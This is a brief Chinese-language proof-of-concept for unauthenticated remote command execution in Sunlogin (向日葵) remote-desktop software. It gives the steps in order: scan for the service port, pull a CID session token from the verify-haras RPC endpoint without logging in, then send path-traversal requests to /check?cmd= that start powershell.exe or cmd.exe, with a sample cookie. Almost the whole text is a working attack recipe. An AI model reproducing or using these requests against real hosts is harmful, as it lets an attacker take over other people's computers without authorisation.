向日葵
POC
ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami
端口扫描
首先扫描端口
获取sid
可以通过已知向日葵端口 + cgi-bin/rpc?action=verify-haras
的拼接来获取CID
的值。 此时的url: http://192.168.159.151:49197/cgi-bin/rpc?action=verify-haras
每次访问不一样,但是都可以用
dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
远程命令执行
/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami
/check?cmd=ping../../../SysWOW64/cmd.exe+/c+whoami
Cookie: CID=6onb943qKJoXQGAmr1BKArugFlO9949g
后记
利用的是未授权获取session+命令拼接导致的远程命令执行